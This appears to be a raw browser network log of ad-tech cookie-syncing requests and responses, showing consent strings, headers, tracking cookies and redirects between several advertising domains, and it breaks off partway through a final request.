imgsync-amsfpairbc.pubmnet.com

IN A

Response

imgsync-amsfpairbc.pubmnet.com

IN A

198.47.127.18
GET

https://ap.lijit.com/pixel?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&redir=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11607%26uid%3D%24UID

Request

GET /pixel?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&redir=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11607%26uid%3D%24UID HTTP/2.0
host: ap.lijit.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 204

date: Sun, 26 May 2024 02:06:57 GMT
vary: Accept-Encoding
access-control-allow-origin: *
access-control-allow-methods: GET, POST, DELETE, PUT
access-control-allow-credentials: true
access-control-allow-headers: X-Requested-With, Content-Type
GET

https://onetag-sys.com/usync/?pubId=69f48c2160c8113&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /usync/?pubId=69f48c2160c8113&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:14; domain=onetag-sys.com; SameSite=None; Secure
content-type: text/html
cache-control: no-transform, no-cache
content-encoding: gzip
content-length: 1525
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=106&redir=1&ot_initiated=1&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /match/?int_id=106&redir=1&ot_initiated=1&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/usync/?pubId=69f48c2160c8113&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 302

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:15; domain=onetag-sys.com; SameSite=None; Secure;
location: https://cm.g.doubleclick.net/pixel?google_nid=one_tag&google_hm=AAABj7KmqZk7un-RI-XFBoAkcHZ7YsyEOeXGyg&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=113&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&callback=https%3A%2F%2Fs.amazon-adsystem.com%2Fecm3%3Fex%3Donetag.com%26id%3D%24%7BUSER_TOKEN%7D&ot_initiated=1

Request

